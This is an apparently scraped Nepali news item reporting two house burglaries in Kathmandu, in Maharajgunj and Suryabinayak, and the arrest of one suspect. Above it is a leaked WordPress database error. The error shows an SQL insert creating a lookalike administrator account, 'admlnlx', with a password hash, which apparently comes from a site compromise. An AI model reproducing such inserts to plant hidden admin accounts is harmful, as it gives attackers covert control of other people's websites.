WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTgedfAGGHKb.WycFBtv13Ru6nuFb4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:55:42', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
राजधानीमा मंगलबार दुई ठाँउबाट साँढे १६ लाख रुपैयाँ चोरी भएको छ। काठमाडौंको महाराजगंजमा दिलबहादुर नेपालीको घरबाट १४ लाख र सूर्यविनायकमा भगवान खत्रीको घरबाट साँढे दुई लाख रुपैयाँ चोरी भएको हो। नेपालीको घरको तेस्रो तल्लाको कोठाको दराजमा राखिएको ९ तोला सुन र पलंगको सिरानीको घर्रामा राखिएको ९ लाख रुपैयाँ गरी १४ लाख रुपैयाँ चोरी भएको प्रहरीले जनाएको छ।
यसैगरी सूर्यविनायकको शिववस्तीमा रहेको खत्रीको घरमा कोही नभएको मौका पारेर मुल ढोकाको ताल्चा फोडेर १० हजार रुपैयाँ नगद र सुनका गरगहनाहरु गरी दुई लाख ४७ हजार रुपैयाँ बराबरको धनमाल चोरी भएको हो। चोरीमा संलग्न दोलखा सैलुङेश्वरी घर भई सल्लाघारी बस्ने अर्जुनबहादुर श्रेष्ठलाई प्रहरीले पक्राउ गरेको जनाएको छ।